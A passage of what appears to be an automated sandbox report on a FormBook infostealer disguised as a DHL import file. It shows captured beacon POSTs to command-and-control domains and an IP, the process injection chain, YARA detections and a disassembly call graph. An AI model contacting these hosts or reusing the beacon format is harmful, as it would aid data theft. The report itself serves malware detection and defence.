                                                                                        Nov 1, 2024 19:45:42.955718040 CET444OUTGET /aajw/?Qz=BJvp0BdhxXiTCTGP&XbDhGVR=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw= HTTP/1.1
                                                                                        Host: www.comvq.fun
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:45:44.023185015 CET335INHTTP/1.1 404
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Fri, 01 Nov 2024 18:45:43 GMT
                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        Vary: Access-Control-Request-Method
                                                                                        Vary: Access-Control-Request-Headers
                                                                                        Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.450032203.161.49.193804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:49.304497004 CET710OUTPOST /aq3t/ HTTP/1.1
                                                                                        Host: www.harmonid.life
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.harmonid.life
                                                                                        Referer: http://www.harmonid.life/aq3t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 34 4d 58 66 4d 37 79 4e 75 43 73 67 33 49 4b 45 6f 78 64 44 4b 6e 57 4a 43 2b 55 42 37 74 53 2b 45 64 7a 6b 74 2f 79 59 48 4d 63 57 70 52 4b 5a 34 57 76 46 47 48 61 6a 37 76 31 7a 30 79 6c 78 45 67 4d 5a 53 6d 72 50 6f 53 72 66 54 51 6d 4a 58 6b 46 2f 2f 6e 70 73 76 75 6f 32 69 53 70 36 54 47 66 77 54 41 46 33 4e 34 63 35 79 68 47 72 76 6a 79 57 68 34 7a 35 62 34 56 73 67 73 4b 54 61 74 39 6c 53 31 33 4a 49 4f 6b 72 69 69 55 61 6f 74 50 6a 71 44 46 4a 71 7a 4a 67 4d 73 4d 43 4f 6c 61 59 6e 4b 32 52 34 6a 44 33 7a 78 35 44 38 71 70 2f 38 73 4c 63 50 44 74 59 34 49 6a 2b 34 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=4MXfM7yNuCsg3IKEoxdDKnWJC+UB7tS+Edzkt/yYHMcWpRKZ4WvFGHaj7v1z0ylxEgMZSmrPoSrfTQmJXkF//npsvuo2iSp6TGfwTAF3N4c5yhGrvjyWh4z5b4VsgsKTat9lS13JIOkriiUaotPjqDFJqzJgMsMCOlaYnK2R4jD3zx5D8qp/8sLcPDtY4Ij+4g==
                                                                                        Nov 1, 2024 19:45:50.008357048 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 18:45:49 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        30192.168.2.450033203.161.49.19380
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:45:52.207448006 CET730OUTPOST /aq3t/ HTTP/1.1
                                                                                        Host: www.harmonid.life
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.harmonid.life
                                                                                        Referer: http://www.harmonid.life/aq3t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 34 4d 58 66 4d 37 79 4e 75 43 73 67 32 72 69 45 74 57 4a 44 4d 48 57 4b 47 4f 55 42 78 4e 53 36 45 64 50 6b 74 39 65 79 48 2b 34 57 6f 77 61 5a 35 54 44 46 48 48 61 6a 7a 50 31 79 72 43 6c 36 45 67 51 76 53 69 6a 50 6f 53 76 66 54 52 32 4a 58 56 46 38 74 48 70 71 6d 4f 6f 77 74 79 70 36 54 47 66 77 54 41 67 53 4e 34 30 35 7a 53 4f 72 74 43 79 56 2f 6f 7a 2b 63 34 56 73 7a 38 4b 58 61 74 38 41 53 33 54 6a 49 49 67 72 69 6d 51 61 70 2f 6e 67 7a 54 46 50 70 44 49 73 64 76 70 46 45 33 66 51 67 4c 48 77 36 67 2b 62 37 58 30 5a 74 62 49 6f 75 73 76 76 53 45 6b 73 31 4c 65 33 6a 6a 63 4b 49 49 45 33 35 56 30 4c 57 66 64 6f 42 39 49 63 7a 6e 30 3d
                                                                                        Data Ascii: XbDhGVR=4MXfM7yNuCsg2riEtWJDMHWKGOUBxNS6EdPkt9eyH+4WowaZ5TDFHHajzP1yrCl6EgQvSijPoSvfTR2JXVF8tHpqmOowtyp6TGfwTAgSN405zSOrtCyV/oz+c4Vsz8KXat8AS3TjIIgrimQap/ngzTFPpDIsdvpFE3fQgLHw6g+b7X0ZtbIousvvSEks1Le3jjcKIIE35V0LWfdoB9Iczn0=
                                                                                        Nov 1, 2024 19:45:52.906157970 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 18:45:52 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:14:42:45
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                                                                                        Imagebase:0x7d0000
                                                                                        File size:1'632'256 bytes
                                                                                        MD5 hash:2F01C94DF712E58B8227588BA7A376C6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:14:43:02
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                                                                                        Imagebase:0x340000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:14:43:20
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe"
                                                                                        Imagebase:0x730000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:14:43:22
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Windows\SysWOW64\wusa.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\SysWOW64\wusa.exe"
                                                                                        Imagebase:0x7ff70f330000
                                                                                        File size:325'120 bytes
                                                                                        MD5 hash:EB96F0F207F203DD0B6D8A2625270495
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:14:43:22
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                        Imagebase:0x9e0000
                                                                                        File size:47'104 bytes
                                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:14:43:38
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe"
                                                                                        Imagebase:0x730000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:14:43:50
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff6bf500000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:2.7%
                                                                                          Dynamic/Decrypted Code Coverage:2.1%
                                                                                          Signature Coverage:3.4%
                                                                                          Total number of Nodes:1631
                                                                                          Total number of Limit Nodes:41
                                                                                          execution_graph 95449 822a00 95464 7dd7b0 ISource 95449->95464 95450 7ddb11 PeekMessageW 95450->95464 95451 7dd807 GetInputState 95451->95450 95451->95464 95452 821cbe TranslateAcceleratorW 95452->95464 95454 7ddb8f PeekMessageW 95454->95464 95455 7dda04 timeGetTime 95455->95464 95456 7ddb73 TranslateMessage DispatchMessageW 95456->95454 95457 7ddbaf Sleep 95475 7ddbc0 95457->95475 95458 822b74 Sleep 95458->95475 95459 7ee551 timeGetTime 95459->95475 95460 821dda timeGetTime 95629 7ee300 23 API calls 95460->95629 95463 822c0b GetExitCodeProcess 95465 822c21 WaitForSingleObject 95463->95465 95466 822c37 CloseHandle 95463->95466 95464->95450 95464->95451 95464->95452 95464->95454 95464->95455 95464->95456 95464->95457 95464->95458 95464->95460 95468 7dd9d5 95464->95468 95481 7ddd50 95464->95481 95488 7ddfd0 95464->95488 95511 7e1310 95464->95511 95566 7eedf6 95464->95566 95571 7dbf40 95464->95571 95630 843a2a 23 API calls 95464->95630 95631 7dec40 95464->95631 95655 84359c 82 API calls __wsopen_s 95464->95655 95465->95464 95465->95466 95466->95475 95467 822a31 95467->95468 95469 8629bf GetForegroundWindow 95469->95475 95471 822ca9 Sleep 95471->95464 95475->95459 95475->95463 95475->95464 95475->95467 95475->95468 95475->95469 95475->95471 95656 855658 23 API calls 95475->95656 95657 83e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95475->95657 95658 83d4dc 47 API calls 95475->95658 95482 7ddd6f 95481->95482 95483 7ddd83 95481->95483 95659 7dd260 95482->95659 95691 84359c 82 API calls __wsopen_s 95483->95691 95486 7ddd7a 95486->95464 95487 822f75 95487->95487 95489 7de010 95488->95489 95503 7de0dc ISource 95489->95503 95737 7f0242 5 API calls __Init_thread_wait 95489->95737 95492 822fca 95492->95503 95738 7da961 95492->95738 95493 7da961 22 API calls 95493->95503 95499 822fee 95744 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95499->95744 95503->95493 95505 7dec40 207 API calls 95503->95505 95506 7de3e1 95503->95506 95507 7e04f0 22 API calls 95503->95507 95508 84359c 82 API calls 95503->95508 95734 7da8c7 22 API calls __fread_nolock 95503->95734 95735 7da81b 41 API calls 95503->95735 95736 7ea308 207 API calls 95503->95736 95745 7f0242 5 API calls __Init_thread_wait 95503->95745 95746 7f00a3 29 API calls __onexit 95503->95746 95747 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95503->95747 95748 8547d4 207 API calls 95503->95748 95749 8568c1 207 API calls 95503->95749 95505->95503 95506->95464 95507->95503 95508->95503 95512 7e1376 95511->95512 95513 7e17b0 95511->95513 95514 826331 95512->95514 95515 7e1390 95512->95515 95827 7f0242 5 API calls __Init_thread_wait 95513->95827 95838 85709c 207 API calls 95514->95838 95750 7e1940 95515->95750 95519 7e17ba 95525 7e17fb 95519->95525 95828 7d9cb3 95519->95828 95521 82633d 95521->95464 95522 7e1940 9 API calls 95524 7e13b6 95522->95524 95524->95525 95526 7e13ec 95524->95526 95527 7e182c 95525->95527 95528 826346 95525->95528 95526->95528 95551 7e1408 __fread_nolock 95526->95551 95835 7daceb 23 API calls ISource 95527->95835 95839 84359c 82 API calls __wsopen_s 95528->95839 95529 7e17d4 95834 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95529->95834 95532 7e1839 95836 7ed217 207 API calls 95532->95836 95535 82636e 95840 84359c 82 API calls __wsopen_s 95535->95840 95536 7e152f 95538 7e153c 95536->95538 95539 8263d1 95536->95539 95541 7e1940 9 API calls 95538->95541 95842 855745 54 API calls _wcslen 95539->95842 95542 7e1549 95541->95542 95546 8264fa 95542->95546 95548 7e1940 9 API calls 95542->95548 95543 7efddb 22 API calls 95543->95551 95544 7e1872 95837 7efaeb 23 API calls 95544->95837 95545 7efe0b 22 API calls 95545->95551 95555 826369 95546->95555 95844 84359c 82 API calls __wsopen_s 95546->95844 95553 7e1563 95548->95553 95550 7dec40 207 API calls 95550->95551 95551->95532 95551->95535 95551->95536 95551->95543 95551->95545 95551->95550 95552 8263b2 95551->95552 95551->95555 95841 84359c 82 API calls __wsopen_s 95552->95841 95553->95546 95558 7e15c7 ISource 95553->95558 95843 7da8c7 22 API calls __fread_nolock 95553->95843 95555->95464 95557 7e1940 9 API calls 95557->95558 95558->95544 95558->95546 95558->95555 95558->95557 95560 7e167b ISource 95558->95560 95760 84744a 95558->95760 95816 85958b 95558->95816 95819 7d6246 95558->95819 95823 8483da 95558->95823 95559 7e171d 95559->95464 95560->95559 95826 7ece17 22 API calls ISource 95560->95826 95568 7eee09 95566->95568 95569 7eee12 95566->95569 95567 7eee36 IsDialogMessageW 95567->95568 95567->95569 95568->95464 95569->95567 95569->95568 95570 82efaf GetClassLongW 95569->95570 95570->95567 95570->95569 96112 7dadf0 95571->96112 95573 7dbf9d 95574 8204b6 95573->95574 95575 7dbfa9 95573->95575 96131 84359c 82 API calls __wsopen_s 95574->96131 95577 7dc01e 95575->95577 95578 8204c6 95575->95578 96117 7dac91 95577->96117 96132 84359c 82 API calls __wsopen_s 95578->96132 95582 837120 22 API calls 95597 7dc039 ISource __fread_nolock 95582->95597 95583 7dc7da 95586 7efe0b 22 API calls 95583->95586 95594 7dc808 __fread_nolock 95586->95594 95588 8204f5 95591 82055a 95588->95591 96133 7ed217 207 API calls 95588->96133 95610 7dc603 95591->95610 96134 84359c 82 API calls __wsopen_s 95591->96134 95592 7efe0b 22 API calls 95600 7dc350 ISource __fread_nolock 95592->95600 95593 7daf8a 22 API calls 95593->95597 95594->95592 95595 82091a 96144 843209 23 API calls 95595->96144 95597->95582 95597->95583 95597->95588 95597->95591 95597->95593 95597->95594 95597->95595 95599 7dec40 207 API calls 95597->95599 95601 8208a5 95597->95601 95605 820591 95597->95605 95606 8208f6 95597->95606 95597->95610 95612 7dbbe0 40 API calls 95597->95612 95615 7dc237 95597->95615 95617 7efddb 22 API calls 95597->95617 95623 8209bf 95597->95623 95627 7efe0b 22 API calls 95597->95627 96121 7dad81 95597->96121 96136 837099 22 API calls __fread_nolock 95597->96136 96137 855745 54 API calls _wcslen 95597->96137 96138 7eaa42 22 API calls ISource 95597->96138 96139 83f05c 40 API calls 95597->96139 96140 7da993 41 API calls 95597->96140 96141 7daceb 23 API calls ISource 95597->96141 95599->95597 95628 7dc3ac 95600->95628 96130 7ece17 22 API calls ISource 95600->96130 95602 7dec40 207 API calls 95601->95602 95604 8208cf 95602->95604 95604->95610 96142 7da81b 41 API calls 95604->96142 96135 84359c 82 API calls __wsopen_s 95605->96135 96143 84359c 82 API calls __wsopen_s 95606->96143 95610->95464 95612->95597 95614 7dc253 95618 820976 95614->95618 95621 7dc297 ISource 95614->95621 95615->95614 96145 7da8c7 22 API calls __fread_nolock 95615->96145 95617->95597 96146 7daceb 23 API calls ISource 95618->96146 95621->95623 96128 7daceb 23 API calls ISource 95621->96128 95623->95610 96147 84359c 82 API calls __wsopen_s 95623->96147 95624 7dc335 95624->95623 95625 7dc342 95624->95625 96129 7da704 22 API calls ISource 95625->96129 95627->95597 95628->95464 95629->95464 95630->95464 95636 7dec76 ISource 95631->95636 95632 7f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95632->95636 95633 7f00a3 29 API calls pre_c_initialization 95633->95636 95634 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95634->95636 95635 824beb 96164 84359c 82 API calls __wsopen_s 95635->96164 95636->95632 95636->95633 95636->95634 95636->95635 95637 7dfef7 95636->95637 95639 7efddb 22 API calls 95636->95639 95641 824b0b 95636->95641 95642 7da8c7 22 API calls 95636->95642 95643 824600 95636->95643 95647 7ded9d ISource 95636->95647 95650 7dfbe3 95636->95650 95651 7da961 22 API calls 95636->95651 95654 7df3ae ISource 95636->95654 96157 7e01e0 207 API calls 2 library calls 95636->96157 96158 7e06a0 41 API calls ISource 95636->96158 95637->95647 96160 7da8c7 22 API calls __fread_nolock 95637->96160 95639->95636 96162 84359c 82 API calls __wsopen_s 95641->96162 95642->95636 95643->95647 96159 7da8c7 22 API calls __fread_nolock 95643->96159 95647->95464 95650->95647 95652 824bdc 95650->95652 95650->95654 95651->95636 96163 84359c 82 API calls __wsopen_s 95652->96163 95654->95647 96161 84359c 82 API calls __wsopen_s 95654->96161 95655->95464 95656->95475 95657->95475 95658->95475 95660 7dec40 207 API calls 95659->95660 95665 7dd29d 95660->95665 95661 821bc4 95718 84359c 82 API calls __wsopen_s 95661->95718 95663 7dd30b ISource 95663->95486 95664 7dd6d5 95664->95663 95675 7efe0b 22 API calls 95664->95675 95665->95661 95665->95663 95665->95664 95666 7dd3c3 95665->95666 95671 7dd4b8 95665->95671 95680 7efddb 22 API calls 95665->95680 95686 7dd429 ISource __fread_nolock 95665->95686 95666->95664 95668 7dd3ce 95666->95668 95667 7dd5ff 95669 821bb5 95667->95669 95670 7dd614 95667->95670 95692 7efddb 95668->95692 95717 855705 23 API calls 95669->95717 95674 7efddb 22 API calls 95670->95674 95703 7efe0b 95671->95703 95684 7dd46a 95674->95684 95676 7dd3d5 __fread_nolock 95675->95676 95678 7dd3f6 95676->95678 95679 7efddb 22 API calls 95676->95679 95678->95686 95702 7dbec0 207 API calls 95678->95702 95679->95678 95680->95665 95682 821ba4 95716 84359c 82 API calls __wsopen_s 95682->95716 95684->95486 95686->95667 95686->95682 95686->95684 95687 821b7f 95686->95687 95689 821b5d 95686->95689 95713 7d1f6f 207 API calls 95686->95713 95715 84359c 82 API calls __wsopen_s 95687->95715 95714 84359c 82 API calls __wsopen_s 95689->95714 95691->95487 95695 7efde0 95692->95695 95694 7efdfa 95694->95676 95695->95694 95698 7efdfc 95695->95698 95719 7fea0c 95695->95719 95726 7f4ead 7 API calls 2 library calls 95695->95726 95697 7f066d 95728 7f32a4 RaiseException 95697->95728 95698->95697 95727 7f32a4 RaiseException 95698->95727 95701 7f068a 95701->95676 95702->95686 95705 7efddb 95703->95705 95704 7fea0c ___std_exception_copy 21 API calls 95704->95705 95705->95704 95706 7efdfa 95705->95706 95709 7efdfc 95705->95709 95731 7f4ead 7 API calls 2 library calls 95705->95731 95706->95686 95708 7f066d 95733 7f32a4 RaiseException 95708->95733 95709->95708 95732 7f32a4 RaiseException 95709->95732 95712 7f068a 95712->95686 95713->95686 95714->95684 95715->95684 95716->95684 95717->95661 95718->95663 95724 803820 __dosmaperr 95719->95724 95720 80385e 95730 7ff2d9 20 API calls __dosmaperr 95720->95730 95721 803849 RtlAllocateHeap 95723 80385c 95721->95723 95721->95724 95723->95695 95724->95720 95724->95721 95729 7f4ead 7 API calls 2 library calls 95724->95729 95726->95695 95727->95697 95728->95701 95729->95724 95730->95723 95731->95705 95732->95708 95733->95712 95734->95503 95735->95503 95736->95503 95737->95492 95739 7efe0b 22 API calls 95738->95739 95740 7da976 95739->95740 95741 7efddb 22 API calls 95740->95741 95742 7da984 95741->95742 95743 7f00a3 29 API calls __onexit 95742->95743 95743->95499 95744->95503 95745->95503 95746->95503 95747->95503 95748->95503 95749->95503 95751 7e1981 95750->95751 95756 7e195d 95750->95756 95845 7f0242 5 API calls __Init_thread_wait 95751->95845 95754 7e198b 95754->95756 95846 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95754->95846 95755 7e8727 95759 7e13a0 95755->95759 95848 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95755->95848 95756->95759 95847 7f0242 5 API calls __Init_thread_wait 95756->95847 95759->95522 95761 847469 95760->95761 95762 847474 95760->95762 95880 7db567 39 API calls 95761->95880 95764 847554 95762->95764 95767 7da961 22 API calls 95762->95767 95765 7efddb 22 API calls 95764->95765 95814 8476a4 95764->95814 95766 847587 95765->95766 95768 7efe0b 22 API calls 95766->95768 95769 847495 95767->95769 95771 847598 95768->95771 95770 7da961 22 API calls 95769->95770 95772 84749e 95770->95772 95773 7d6246 CloseHandle 